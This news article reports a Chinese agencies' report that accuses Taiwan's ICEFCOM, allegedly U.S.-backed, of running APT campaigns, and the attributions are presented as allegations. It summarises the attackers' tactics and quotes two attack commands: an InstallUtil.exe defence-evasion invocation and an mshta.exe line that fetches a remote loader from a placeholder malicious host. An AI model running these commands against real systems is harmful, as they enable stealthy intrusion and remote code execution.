China Alleges Taiwan, Backed by the U.S., Is Behind Advanced Persistent Threat Operations

Chinese cybersecurity agencies, backed by leading research labs and security firms, have publicly accused Taiwan’s Information, Communications and Electronic Force Command (ICEFCOM), allegedly supported by the United States, of orchestrating a multi-year campaign of Advanced Persistent Threat (APT) attacks targeting critical infrastructure and sensitive entities across mainland China, Hong Kong, and Macao.

The investigation, released today by the National Computer Virus Emergency Response Center and 360 Digital Security Group, details an extensive web of cyber espionage operations attributed to so-called “T-APTs” hacker groups said to be acting on behalf of Taiwan’s Democratic Progressive Party (DPP) and under ICEFCOM’s direction.

Technical Operation Tactics: Sophisticated, Yet Rely On Known Vulnerabilities

Attack Chain and Notable Tools

The report singles out five major APT groups — APT-C-01 (“Poison Vine”), APT-C-62 (“Viola Tricolor”), APT-C-64 (“Anonymous 64”), APT-C-65 (“Neon Pothos”), and APT-C-67 (“Ursa”) — as core threat actors. Each group purportedly specializes in targeting different sectors via a range of tactics, techniques, and procedures (TTPs). The hallmarks of their operations include:

• Reconnaissance: Use of platforms like Shodan and Censys to map assets and gather target data.
• Initial Access: Lure documents, phishing emails, and phishing websites modeled after legitimate industry or government portals, with attachments containing malicious code. Example file types: .docx, .pdf, .rtf, .lnk.
• Exploitation: Predominantly leveraging known vulnerabilities in Microsoft Windows, Office suites, OA systems, CRM, and VSS.
• Persistence: Establishing footholds via Windows scheduled tasks, startup folders, and registry entries.
• Lateral Movement: Use of open-source and commercial tools (pwdump8, MirrorDump, POSTDump, Procdump, Fscan), facilitating credential extraction and further infiltration.
• Defense Evasion: Employing InstallUtil.exe to execute payloads and avoid detection.
• Command and Control (C2): Deployment of well-known malware such as Cobalt Strike, QuasarRAT, Sliver, and legitimate admin tools like GotoHTTP for remote operations and data exfiltration.

A representative code snippet illustrates how InstallUtil.exe is abused for stealthy execution:

bashC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe

Such tactics blend legitimate system operations with malicious intent, making detection challenging.

Examples of Malware in Use

• QuasarRAT: Open-source remote access Trojan with features like keylogging, screen capture, and file management. Deobfuscated samples revealed embedded C2 server addresses, encrypted using AES.
• Sliver RAT: Cross-platform C2 framework, dropped and decrypted in memory via a multistage process involving downloaded AES-encrypted shellcode.
• Stager Payloads: Compact code snippets (sometimes ≤1,000 bytes) delivered after successful exploitation, connecting back to attacker C2s over HTTPS/TCP to fetch secondary payloads.

The joint investigation notes that while the attackers demonstrate planning and technical proficiency, their toolkit heavily relies on public, open-source software and widely known exploits rather than zero-day vulnerabilities. Incident responses often revealed tell-tale signs of operational sloppiness, such as obvious language traces and re-used phishing templates.

Case Study: Phishing and Lateral Movement

A typical attack progression:

1. Victim receives a targeted spear phishing email, with an attached .lnk masquerading as a PDF.
2. The .lnk triggers execution of a remote HTA file via mshta.exe, downloading a loader:textmshta.exe http://malicious-site.com/loader.hta
3. Loader fetches and runs a backdoor (e.g., QuasarRAT or Cobalt Strike Beacon) and schedules persistence with a fake system task.

Attribution and Geopolitical Ramifications

ICEFCOM’s Structure and “Foreign Collusion” Allegations

Analysts identified ICEFCOM Taiwan’s military-linked cyber command as the organizational hub for these activities, with over 6,000 personnel and roots in U.S. cyber doctrine. The report alleges a close operational link to the U.S. Cyber Command, especially since high-profile arms deals and joint defense forums in 2024.

Profiled leaders including Commander Jian Hua-ching and Deputy Commander Wang Yue-yang — were named, with detailed backgrounds, as a warning of further “tracking and exposure.” The mainland’s agencies vow to escalate countermeasures and international legal action.

Technical Assessment

Despite the breadth of the campaign, the assessment labels the threat groups as technically second-tier, citing:

• Reliance on known vulnerabilities and scarce use of zero-day exploits.
• Overdependence on free/open-source malware.
• Weak anti-forensics and error-prone phishing campaigns, rendering many operations attributable.

While China’s technical attribution of the cyberattacks to Taiwan’s ICEFCOM and, by extension, the United States, constitutes one of the most detailed accusations to date, the debate over the true scope and direction of these APT groups is likely to escalate.

The exposure of TTPs and malware hashes, alongside calls for international cooperation against “foreign cyber subversion,” marks a new chapter in both cyber-warfare and cross-Strait tensions.

Whether these claims lead to diplomatic fallout, technical countermeasures, or new cybersecurity doctrines, one thing is clear: the cyber battlefield across the Taiwan Strait is rapidly evolving.